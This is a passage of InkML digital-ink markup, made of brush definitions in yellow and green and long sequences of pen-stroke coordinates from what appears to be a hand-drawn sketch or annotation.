31 0,-1-1 0,21-10 0,-26 9 0,1 1 0,1 1 0,-1 1 0,21-4 0,4 2 0,0-3 0,0-1 0,67-29 0,63-31 0,-146 61 0,0-2 0,-1 0 0,47-31 0,-62 35 0,8-6 0,33-20 0,-4 6 0,-30 17 0,1 0 0,25-10 0,-30 14 0,0 0 0,0 0 0,-1-2 0,13-9 0,-13 7 0,2 2 0,-1 0 0,19-9 0,-18 11-227,0-1-1,-1-1 1,0 0-1,-1-1 1,18-15-1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5.178"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">578 0 24575,'8'3'0,"-14"3"0,-15 3 0,-1-3 0,0 1 0,0 1 0,1 1 0,0 1 0,1 1 0,0 1 0,0 1 0,2 0 0,-1 1 0,-30 33 0,36-36 0,0 0 0,-1-1 0,0 0 0,-25 12 0,21-12 0,0 1 0,-23 18 0,34-24 0,0 0 0,0 0 0,-1-1 0,1 0 0,-11 3 0,-18 10 0,33-15 0,0 1 0,0 0 0,-1-1 0,1 1 0,1 0 0,-1 0 0,0 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,0 1 0,-1 0 0,2 0 0,-2 9 0,0 6 0,1 0 0,4 37 0,-1-16 0,-1-31 0,0-1 0,0 1 0,1-1 0,0 0 0,1 1 0,0-1 0,0 0 0,6 9 0,1 1 0,0 0 0,18 21 0,-20-30 0,-1-1 0,1 0 0,1 0 0,-1-1 0,1 0 0,1-1 0,-1 0 0,1 0 0,0-1 0,0 0 0,1-1 0,18 6 0,24 7 0,-42-13 0,-1 0 0,1 0 0,1-1 0,-1-1 0,14 2 0,-7-2 0,-1 1 0,1 0 0,28 11 0,9 1 0,-28-8 0,-1-2 0,1-1 0,44 1 0,-37-4 0,-21 0 0,1-1 0,-1 0 0,24-4 0,-33 3 0,-1 1 0,0-1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 1 0,3-6 0,-2 2 0,0 0 0,1 1 0,0 0 0,1-1 0,-1 1 0,1 1 0,0-1 0,9-6 0,23-23 0,-34 28 0,0 0 0,0 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,-1 1 0,0-1 0,0 0 0,-1 1 0,0-1 0,0-7 0,3-33 0,5-10 0,-3-1 0,-5-110 0,-2 68 0,1 86-114,0 1 1,0 0-1,-2 0 0,0 0 0,0 1 1,-1-1-1,0 1 0,-1 0 0,-1 0 1,0 0-1,-14-21 0,12 24-6712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7.860"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'371'0'0,"-355"1"0,1 1 0,28 6 0,-28-4 0,1-1 0,20 1 0,17-5 0,27 0 0,-76 1 0,1 1 0,-1 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 1 0,1 0 0,6 4 0,-8-3 0,1 0 0,-1 0 0,0 0 0,-1 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,2 12 0,0 8 0,-1 0 0,-3 35 0,1-42 0,-2 6 0,-1 1 0,-1-1 0,-12 39 0,-3 17 0,7-17 0,-34 100 0,33-128-341,2 1 0,1 0-1,-6 46 1,15-65-6485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9.103"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'0'4'0,"0"5"0,0 4 0,0 4 0,0 3 0,0 1 0,0 1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0-1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1.044"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">239 23 24575,'-4'2'0,"0"0"0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,1 0 0,0 0 0,-1 0 0,1 1 0,-3 3 0,-2 2 0,-41 49 0,39-44 0,0-1 0,-1-1 0,0 0 0,-23 19 0,31-29 0,0 1 0,1-1 0,-1 1 0,0 0 0,1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,-1 1 0,0 4 0,-9 54 0,5-25 0,4-26 0,0 1 0,0-1 0,2 1 0,-1-1 0,1 1 0,1-1 0,0 1 0,2 11 0,-1-18 0,0 1 0,0-1 0,0 1 0,0-1 0,1 0 0,0 1 0,0-1 0,0-1 0,1 1 0,0 0 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,7 4 0,52 36 0,-50-31 0,1-2 0,0 0 0,0-1 0,1-1 0,20 8 0,-20-11 0,1-2 0,25 3 0,13 2 0,-14-3 0,0-1 0,0-1 0,65-6 0,-17 1 0,-5 4 0,92-5 0,-170 3 0,1-1 0,-1 0 0,0 0 0,0-1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0-1 0,7-7 0,-2-1 0,0 0 0,-1 0 0,0-1 0,11-25 0,10-13 0,-22 41 0,-1-1 0,-1 0 0,0 0 0,0-1 0,-1 1 0,-1-1 0,0-1 0,0 1 0,-2 0 0,3-18 0,-5 29 0,1-27 0,1 1 0,8-34 0,-9 54 0,1 1 0,-1 0 0,-1-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,-2-11 0,1 14 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 1 0,-6-3 0,-141-75 0,137 73 0,0 0 0,0 1 0,-1 1 0,0 0 0,0 0 0,0 2 0,0-1 0,-1 2 0,-22-1 0,18 3-112,3 0-27,0-1 0,1 0-1,-1-1 1,0-1 0,1 0 0,-1 0-1,1-2 1,-23-8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5.225"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">20600 1913 24575,'-3'-1'0,"-1"0"0,1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 0 0,0 0 0,1 0 0,-1-1 0,-2-3 0,-9-6 0,-6-2 0,4 1 0,-2 1 0,1 1 0,-2 1 0,-27-12 0,32 16 0,1-1 0,0-1 0,1 0 0,0 0 0,0-1 0,1-1 0,0 0 0,-14-16 0,11 10 0,-2 1 0,0 1 0,-19-13 0,4 8 0,-38-16 0,58 29 0,0-2 0,0 1 0,0-1 0,1-1 0,-12-12 0,9 8 0,-30-22 0,-121-86 0,156 114 0,-36-24 0,26 19 0,0-1 0,-24-24 0,23 19 0,-1 1 0,-37-26 0,48 39 0,1 0 0,-1 0 0,0 0 0,-1 1 0,1 1 0,-17-3 0,17 3 0,-1 0 0,1 0 0,0 0 0,0-1 0,1-1 0,-1 0 0,-13-7 0,-106-79 0,110 78 0,0 1 0,-1 1 0,-22-9 0,-3-1 0,4 1 0,-39-21 0,66 30 0,-1 2 0,-1 0 0,0 0 0,0 2 0,0 0 0,0 0 0,-1 2 0,0 0 0,-22-3 0,19 4 0,0 0 0,0-2 0,0 0 0,0-1 0,1-1 0,0 0 0,1-2 0,-26-15 0,19 11 0,-34-11 0,-8-4 0,41 17 0,-54-16 0,54 20 0,-1-2 0,-32-15 0,41 16 0,0 2 0,0 0 0,-1 1 0,0 1 0,-22-2 0,15 2 0,-45-13 0,36 4 0,-1 2 0,0 1 0,-1 2 0,0 2 0,-56-3 0,71 7 0,1 0 0,-1-2 0,1 0 0,0-1 0,0-1 0,1 0 0,-29-15 0,36 17 0,0 0 0,0 0 0,0 1 0,0 1 0,-14-1 0,12 1 0,-1 0 0,1-1 0,-20-6 0,-136-48 0,10 13 0,52 22 0,75 14 0,7 1 0,0 2 0,-54-5 0,49 8 0,-33-7 0,34 4 0,-42-1 0,35 4 0,-45-8 0,7 0 0,-55-10 0,80 10 0,34 6 0,-1 0 0,-31-1 0,-14 4 0,22 2 0,0-3 0,-57-9 0,-77-11 0,35 1 0,49 8 0,16 4 0,-34-1 0,71 8 0,-36-7 0,34 4 0,-1 2 0,0 1 0,-40 4 0,-68-3 0,76-10 0,46 7 0,-50-4 0,-532 9 0,577-2 0,-47-9 0,45 5 0,-42-1 0,-880 7 0,939-2 0,-1-1 0,-28-6 0,27 4 0,1 1 0,-22-1 0,-535 2 0,280 4 0,273-2 0,1 1 0,-1 1 0,-35 8 0,-1 1 0,-92 6 0,104-13 0,-14 6 0,43-6 0,0-1 0,-23 1 0,19-2 0,-35 7 0,35-5 0,-37 3 0,-6-7 0,34-1 0,0 2 0,1 0 0,-50 10 0,54-7 0,0-1 0,-1-1 0,1-1 0,-29-2 0,-48 1 0,-17 21 0,71-19 0,-49 10 0,-47 10 0,110-18 0,-1-1 0,-48-2 0,48-2 0,0 2 0,-49 7 0,10 2 0,-1-4 0,-131-6 0,84-2 0,56 2 0,-3-2 0,0 4 0,-69 11 0,84-7 0,0-2 0,-58-4 0,59-1 0,1 3 0,-66 9 0,76-7 0,0 0 0,-67-5 0,-30 3 0,62 8 0,47-5 0,-48 2 0,-698-8 0,752 2 0,0 2 0,0 0 0,-39 12 0,38-9 0,0 0 0,0-2 0,-32 2 0,21-3 0,1 1 0,-56 14 0,11-1 0,-73 7 0,51-5 0,9 0 0,24-8 0,37-5 0,-1-2 0,-35 1 0,-113 9 0,98-5 0,14 1 0,39-6 0,-46 3 0,40-7 0,0 2 0,-47 8 0,43-5 0,1-1 0,-1-3 0,-44-3 0,-65 3 0,89 10 0,43-8 0,0 0 0,-23 2 0,18-5 0,1 1 0,-1 1 0,1 1 0,0 1 0,0 1 0,0 1 0,1 0 0,-28 14 0,34-15 0,0 0 0,0-1 0,0-1 0,0 0 0,-26 2 0,21-4 0,0 2 0,-25 7 0,-260 73 0,150-55 0,131-25 0,1 2 0,-27 8 0,25-6 0,-37 7 0,-72 16 0,102-21 0,0-1 0,-1-1 0,0-2 0,-40 1 0,54-5 0,1 1 0,0 0 0,1 1 0,-32 11 0,31-9 0,0 0 0,0-1 0,-1-1 0,-25 2 0,-2-1 0,-1 2 0,1 2 0,-57 17 0,49-12 0,37-9 0,-13 4 0,0-2 0,-1-1 0,-42 2 0,42-4 0,0 1 0,1 2 0,-1 0 0,-43 17 0,21-7 0,14-5 0,-55 7 0,52-10 0,-54 18 0,55-14 0,-49 8 0,74-17 0,-1 0 0,-25 11 0,29-9 0,0-1 0,0 0 0,-1-1 0,1-1 0,-16 2 0,-6-2 0,0 0 0,0 3 0,0 0 0,1 2 0,-1 2 0,-53 21 0,59-20 0,0-1 0,0-2 0,-1 0 0,-56 5 0,82-12 0,-40 4 0,31-4 0,1 0 0,0 1 0,0 1 0,0 0 0,0 0 0,0 1 0,0 0 0,-10 6 0,2-1 0,0-1 0,-35 9 0,-10 3 0,42-12 0,-1-1 0,-37 5 0,34-7 0,-44 13 0,-126 48 0,162-55 0,-51 10 0,-24 6 0,77-16 0,-38 5 0,39-10 0,-50 17 0,35-6 0,-1-2 0,-49 9 0,21-16 0,55-6 0,0 0 0,1 1 0,0 1 0,-25 8 0,-74 24 0,-63 25 0,169-56 0,0-1 0,0 0 0,-15 2 0,16-4 0,-1 1 0,1 1 0,0 0 0,-13 5 0,4 0 0,-1-1 0,0-1 0,0-1 0,-26 3 0,18-4 0,-41 14 0,63-16-124,1 0 0,-1-1 0,0 1 0,1-1 0,-1 0 0,0 0-1,0-1 1,0 0 0,0 0 0,-6-1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6.469"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">440 1 24575,'-3'1'0,"1"1"0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0 0 0,0-1 0,-1 5 0,-5 5 0,-11 11 0,-1-1 0,-23 21 0,34-35 0,-1 0 0,0 0 0,-1-1 0,0 0 0,0-1 0,-1-1 0,-14 6 0,19-8 0,0 0 0,1 0 0,0 0 0,-1 1 0,1 0 0,1 0 0,-1 1 0,1-1 0,-1 1 0,1 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,-6 12 0,-25 31 0,7-22 0,-9 12 0,35-36 0,-2 1 0,1 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,1 0 0,-3 8 0,5-11 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,1 1 0,16 7 0,1 0 0,-1-1 0,1-1 0,36 8 0,4 2 0,-17 1 0,6 3 0,-11-9 0,48 21 0,5 2 0,-89-34 0,178 63 0,-166-56-1365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8.824"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 69 24575,'0'-2'0,"1"1"0,-1-1 0,1 0 0,-1 1 0,1-1 0,0 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,2 0 0,39-18 0,-34 16 0,1-1 0,0 1 0,0 1 0,0-1 0,1 1 0,-1 1 0,1 0 0,0 1 0,16 1 0,-24-1 0,1 0 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 6 0,0 15 0,0 0 0,-2 0 0,-3 26 0,0 6 0,1-38 0,0-1 0,-2 1 0,0-1 0,-1 0 0,-1-1 0,-16 32 0,9-18 0,-40 59 0,57-90 0,0 1 0,0 0 0,0-1 0,1 0 0,-1 0 0,0 0 0,7-4 0,182-87 0,-177 85-44,0 1 0,0 1 0,18-4 0,-12 4-1145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11.427"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">544 24 24575,'-26'-1'0,"15"0"0,-1 1 0,1 0 0,-1 1 0,1 0 0,-1 0 0,1 1 0,-1 1 0,1 0 0,0 0 0,-20 10 0,-32 15 0,54-25 0,0 0 0,0 0 0,0 1 0,0 1 0,1-1 0,0 1 0,0 1 0,0-1 0,1 1 0,0 1 0,0-1 0,-10 13 0,-17 27 0,24-34 0,1 0 0,0 1 0,1 0 0,0 0 0,1 0 0,0 1 0,-8 25 0,13-32 0,-1 0 0,1 0 0,-2 0 0,1-1 0,-1 1 0,0-1 0,-5 6 0,5-7 0,0 0 0,0 1 0,1-1 0,-1 1 0,2 0 0,-1 0 0,0 0 0,1 0 0,0 1 0,-1 7 0,-6 50 0,3-31 0,2 0 0,0 40 0,4-64 0,1 1 0,-1-1 0,2 0 0,-1 0 0,2 1 0,-1-1 0,1 0 0,0-1 0,1 1 0,0 0 0,0-1 0,8 11 0,9 10 0,24 29 0,-41-53 0,0 0 0,0 0 0,-1 1 0,0-1 0,4 8 0,-6-8 0,1-1 0,0 0 0,0 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,1-1 0,-1 0 0,7 5 0,9 2 0,33 14 0,1 0 0,-38-17 0,0 0 0,1-2 0,0 0 0,0 0 0,30 3 0,-8-4 0,53-1 0,-35-2 0,-19 0 0,48-5 0,-75 3 0,0 0 0,-1-1 0,1 0 0,-1-1 0,1 0 0,-1-1 0,0 0 0,0 0 0,15-10 0,15-12 0,-29 20 0,0 0 0,-1 0 0,1-1 0,-2-1 0,1 0 0,8-9 0,31-39 0,-24 30 0,24-35 0,-41 50 0,-1 0 0,0 0 0,0-1 0,-1 1 0,0-1 0,5-25 0,12-71 0,-18 91 0,0-1 0,10-24 0,-8 25 0,0-1 0,4-21 0,-7 24 0,1 0 0,9-24 0,-8 28 0,-1-1 0,0 1 0,-1-1 0,-1 0 0,2-14 0,-4 21 0,2-14 0,-1 0 0,-2-1 0,1 1 0,-5-22 0,4 36 0,-1 0 0,1-1 0,-1 2 0,0-1 0,0 0 0,0 0 0,-1 0 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,0 0 0,-1 0 0,-8-4 0,-11-3 0,1 0 0,-1 2 0,0 1 0,-49-7 0,22 4 0,29 6 0,0 0 0,-35-1 0,14 5-1365,24 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5.030"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'1'0'0,"1"1"0,-1 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 3 0,13 25 0,-11-15 0,0 1 0,0-1 0,-2 1 0,1 0 0,-2 18 0,0-14 0,0 0 0,6 27 0,-1-10-455,0-1 0,-2 68 0,-3-85-6371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7.133"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">134 220 24575,'0'11'0,"-1"1"0,-1-1 0,0 1 0,-1-1 0,0 0 0,0 0 0,-1 0 0,-1 0 0,0 0 0,0-1 0,-1 0 0,-14 18 0,8-9 0,0 1 0,1 0 0,-14 39 0,21-50 0,2 1 0,-1-1 0,1 1 0,1 0 0,0-1 0,0 1 0,1 0 0,0 0 0,0 0 0,1 0 0,4 13 0,-4-17 0,1-1 0,0 1 0,1-1 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 0 0,0-1 0,7 8 0,3 0 0,1 0 0,17 10 0,24 20 0,-42-30 0,1 0 0,0-1 0,1-1 0,0-1 0,34 15 0,-29-16 0,1-2 0,1 0 0,-1-1 0,37 3 0,92-5 0,-102-4 0,-43 1 0,1 0 0,-1-1 0,0 0 0,1-1 0,-1 1 0,0-1 0,0-1 0,0 1 0,8-5 0,48-35 0,-19 11 0,-34 25 0,0 0 0,-1 0 0,0 0 0,0-1 0,11-13 0,-15 16 0,-2 0 0,1-1 0,0 0 0,-1 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,0 0 0,1 0 0,-2 0 0,1-1 0,-1-4 0,0-236 0,-2 99 0,0 131 0,0 0 0,-1 0 0,-1 0 0,0 1 0,-1 0 0,-1-1 0,-1 2 0,-14-26 0,19 36 0,-1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,0 0 0,-1-1 0,1 1 0,0 1 0,-1-1 0,0 1 0,1 0 0,-10-3 0,-7-1 0,-1 0 0,-27-2 0,-11-3 0,18-4 0,32 11 0,1 0 0,-1 1 0,0 0 0,-1 1 0,-15-2 0,6 3-1365,1 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9.598"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'22'1'0,"-1"0"0,0 1 0,31 7 0,-16-1 0,-21-6 0,0 2 0,0-1 0,0 2 0,0 0 0,-1 1 0,16 8 0,-19-8 0,1-1 0,0-1 0,0 0 0,1-1 0,-1 0 0,1 0 0,15 0 0,-11-1 0,-1 0 0,0 1 0,28 10 0,24 8 0,-48-16 0,37 15 0,-38-12 0,0-1 0,1 0 0,0-2 0,1 0 0,40 3 0,-30-3 0,41 11 0,-48-10 0,-1 0 0,1-2 0,41 2 0,-57-6 0,2 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1 1 0,1 0 0,-1 0 0,0 1 0,1 0 0,9 5 0,9 5 0,51 15 0,-51-18 0,-8-5 0,0 0 0,28 2 0,-27-4 0,-1 0 0,28 9 0,-6 2 0,1-2 0,46 8 0,19 0 0,25 2 0,-14 2 0,-46-6 0,37 6 0,-60-16 0,-23-3 0,47 3 0,-56-7 0,0 2 0,-1 0 0,1 1 0,19 7 0,-19-6 0,-1 0 0,1-1 0,0-1 0,20 2 0,34 1-33,-1 3-1,0 3 0,94 30 1,-71-18-659,178 36 692,-82-23 0,-159-32-22,-2-2 192,-1 2 0,1 0-1,-2 2 1,40 15-1,-54-17-169,0-1 0,1 0 0,-1-1 0,1 0 0,19 1 0,-21-3 0,-7 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,-1 0 0,6 5 0,-6-5 0,0 0 0,1 1 0,0-2 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,1 0 0,-1-1 0,8 3 0,13 0 0,1 2 0,-1 0 0,-1 2 0,42 19 0,-19-8 0,58 17 0,-64-23 0,49 8 0,-65-17 0,-1 1 0,41 15 0,-32-9 0,0-1 0,1-2 0,0-1 0,39 2 0,-42-5 0,2 2 0,42 13 0,-7-2 0,106 26 0,56 24 0,-154-42 0,15 10 0,-60-22 0,0-2 0,50 13 0,110 19 0,-158-36 0,-1 1 0,50 21 0,-49-17 0,0 0 0,42 7 0,8 1 0,-61-13 0,1-2 0,-1 0 0,45 3 0,-39-5 0,0 0 0,0 2 0,-1 1 0,1 2 0,-1 0 0,32 15 0,-28-10 0,1-2 0,0-1 0,37 6 0,-30-9 0,0 2 0,54 20 0,-75-21 0,1-1 0,0 0 0,0-1 0,0-1 0,1-1 0,-1-1 0,26 1 0,-30-2 0,0 0 0,0 1 0,0 0 0,27 10 0,28 7 0,-36-15 0,96 21 0,-65 0 0,-55-21 0,0 0 0,1-1 0,0 0 0,0-1 0,0 0 0,0 0 0,13 0 0,-14-2 0,1 1 0,0 0 0,-1 1 0,1 0 0,17 8 0,23 7 0,-42-14 0,0-1 0,0 1 0,0 1 0,0 0 0,-1 0 0,0 1 0,12 10 0,-10-8 0,0-1 0,0 1 0,0-2 0,19 9 0,-3-4 0,-6-2 0,0-2 0,24 7 0,-31-10 0,0 0 0,0 1 0,0 1 0,12 8 0,25 11 0,-5-3 0,-36-17 0,0 0 0,1-1 0,0 1 0,19 4 0,-19-6 0,1 1 0,-1 0 0,14 6 0,29 12 0,-21-13 0,-2 2 0,1 1 0,-1 2 0,-1 0 0,0 2 0,50 38 0,-70-49 0,-1-1 0,1 0 0,0 0 0,0-1 0,0 0 0,0-1 0,0 0 0,20 2 0,-15-2 0,0 0 0,0 2 0,15 4 0,26 15 0,96 57 0,-130-69 0,1-1 0,31 10 0,-31-12 0,0 0 0,33 19 0,-11-5 0,-32-17 0,-1 1 0,21 12 0,-10-4 0,-1-2 0,2 0 0,0-2 0,37 12 0,0 1 0,-40-15 0,1-1 0,0-1 0,0-1 0,1-1 0,-1-1 0,1-1 0,34 0 0,-31 0 0,0 1 0,0 1 0,-1 1 0,1 1 0,-1 2 0,28 12 0,51 14 0,35-4 0,-68-16 0,93 32 0,-126-34 0,0-2 0,0-2 0,69 7 0,-72-10 0,-1 2 0,37 12 0,-38-10 0,-1-1 0,50 7 0,-47-11 0,56 16 0,4 1 0,-49-13 0,-26-3 0,39 2 0,38 5 0,-63-7 0,38 2 0,-40-5 0,34 6 0,-35-3 0,43 1 0,-45-4 0,41 7 0,-41-4 0,43 1 0,-46-6 0,1 0 0,-1 2 0,38 8 0,-39-6 0,0-1 0,1-1 0,0-1 0,27-3 0,49 3 0,8 20 0,-75-12 0,-1 1 0,0 1 0,0 2 0,59 32 0,-35-16 0,81 50 0,-116-67 0,0-1 0,1 0 0,41 12 0,-47-18 0,-10-3 0,0 0 0,0 0 0,0 1 0,0 0 0,-1 0 0,13 8 0,-14-8-136,0 0-1,0-1 1,1 1-1,-1-1 1,0 0-1,1 0 1,0-1-1,-1 0 0,13 1 1,-1-1-6690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7.455"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 8329 24575,'4'-1'0,"1"0"0,-1 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,6-3 0,11-5 0,74-15 0,5-1 0,53-19 0,-36 13 0,-30 9-640,93-13-1,-57 14 755,221-36-4668,-225 40 3977,41-1 749,9-1-2499,-44-1 2047,342-51-910,-261 42 1190,152-15 0,-254 36 1132,170-39 0,97-48 1484,-330 85-2576,344-96-1332,-297 91 1207,-62 13 90,0-1 0,46-14 0,301-122-5,-243 89 0,72-26 0,-157 60 0,77-44 0,-13 6 0,9-6 34,-78 38-13,1 3 1,68-26 0,107-36-55,-86 31 455,-59 24-353,210-72-60,-132 62-9,33-11 0,14-15 0,111-41 0,-126 46-36,-99 33 0,118-51 1,-86 19-415,102-45-824,-184 90 1284,-8 3 214,1-1-1,-1-1 0,26-18 1,44-32-16,-21 15-215,81-69 0,-57 38 7,-58 49 0,-2-1 0,62-67 0,-81 79 211,0 0-1,1 2 1,1 0 0,32-19 0,-32 22-11,-1 0 1,0-1 0,-1-1 0,-1-1-1,27-30 1,45-54 1268,-71 82-1366,-4 4-103,1 2 0,0-1 0,19-10 0,19-14 0,-28 14 112,39-46 0,-51 53-61,1 0 0,0 0 0,1 1-1,1 1 1,0 0 0,1 1 0,0 1 0,20-10-1,-24 16-50,-1-1 0,1-1 0,-1 1 0,0-2 0,0 0 0,-1 0 0,0-1 0,-1 0 0,10-11 0,11-13 0,2 3 0,1 0 0,50-32 0,27-25 0,116-111 0,-67 64 0,-136 113 48,126-126 993,-118 115-1041,54-45 0,18-17 0,-55 38 0,-28 31 0,1 2 0,26-23 0,-9 9 0,-1-2 0,44-59 0,-22 24 0,21-27 0,-37 45 0,68-69 0,-86 99 51,-2-1 0,23-35 0,-23 30 16,39-43 0,-55 68-139,8-10 251,1 2 1,1 0-1,23-16 0,-31 25-179,-1-1 0,-1 0 0,1 0 0,-1-1 0,0 1 0,-1-2 0,0 1 0,0-1 0,7-14 0,-3 7 0,2 0 0,0 0 0,0 1 0,2 0 0,18-15 0,81-57 0,-82 64 0,-22 16 0,0-1 0,-1 0 0,0 0 0,9-14 0,-12 15 0,1-1 0,0 1 0,1 0 0,0 1 0,0-1 0,0 1 0,11-7 0,25-14 0,-1-3 0,-2-2 0,48-47 0,11-9 0,-3-3 0,-69 63 0,0 2 0,2 1 0,46-31 0,-11 13 0,-1-4 0,61-58 0,-59 58 0,-18 14 0,-7 4 0,-17 13 0,-1-1 0,0-1 0,37-41 0,-43 43 0,0 1 0,2 0 0,0 1 0,0 1 0,1 1 0,1 0 0,24-10 0,1-2 0,-33 17 0,-1-1 0,-1 0 0,16-16 0,10-8 0,-1 4 0,-22 16 0,1 1 0,1 0 0,0 1 0,21-10 0,33-20 0,-54 30 0,1 1 0,0 0 0,28-10 0,-19 8 0,0-1 0,0-1 0,-1-1 0,0-2 0,27-22 0,-43 31 0,11-5 0,0 1 0,1 1 0,24-9 0,-25 11 0,16-6 0,46-11 0,6-1 0,-55 15-109,0 0 0,1 3 0,0 1 0,49-5 0,-63 9 109,-1 0 0,1-2 0,-1 0 0,0-1 0,19-9 0,-11 4 0,35-9 0,-34 12 163,-1-2 1,45-22-1,-42 18-108,16-8-55,5 0 0,-1-3 0,56-38 0,-100 60 0,0 0 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,1 0 0,-1 0 0,10 0 